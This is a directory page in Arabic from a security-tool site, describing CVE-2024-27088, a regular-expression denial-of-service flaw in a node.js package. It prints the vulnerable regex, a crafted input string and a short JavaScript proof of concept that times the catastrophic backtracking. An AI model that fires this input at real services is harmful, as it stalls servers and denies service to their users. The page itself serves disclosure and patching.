Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-27088 — redos | Kitploit
أدوات/GitHubGitHub/200101whoami/cve-2024-27088
التحليل الثابتتحليل الثغرات الأمنيةتحليل الكودالأوراق والأبحاثالتعلم والتعليم
GitHub200101whoami/cve-2024-27088

CVE-2024-27088

redos

عرض المستودع
2منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-27088

ملخص الثغرة

  • CVE-2024-27088

  • Feb 26, 2024

  • ReDoS في حزمة node.js

  • كجزء من مشروع rebob

وصف الثغرة

إرشادات GitHub

root@kitploit:~
/^\sfunction\s([\0-')-\uffff]+)\s(([\0-(-\uffff]))\s*{/

يمكن استغلال هذه الثغرة عند وجود خلل في توازن الأقواس، مما يؤدي إلى تراجع مفرط وزيادة كبيرة في حمل وحدة المعالجة المركزية ووقت المعالجة. يمكن تشغيل هذه الثغرة باستخدام الإدخال التالي:

'function{' + 'n'.repeat(31) + '){'

إليك كود PoC بسيط لتوضيح المشكلة:

root@kitploit:~
const protocolre = /^\sfunction\s([\0-')-\uffff]+)\s(([\0-(-\uffff]))\s*{/;

const startTime = Date.now();
const maliciousInput = 'function{' + 'n'.repeat(31) + '){'

protocolre.test(maliciousInput);

const endTime = Date.now();

console.log("process time: ", endTime - startTime, "ms");

التأثير

قد يؤدي تمرير دوال بأسماء طويلة جدًا أو أسماء وسائط افتراضية معقدة إلى function#copy أو function#toStringTokens إلى توقف البرنامج النصي.

التصحيحات تم الإصلاح باستخدام 3551cdd و a52e957 تم النشر مع الإصدار v0.10.63

الحلول البديلة لا يوجد حل بديل فعلي سوى الامتناع عن استخدام الأدوات المذكورة أعلاه.

المشكلة الحزمة المستهدفة

تنزيل الأداة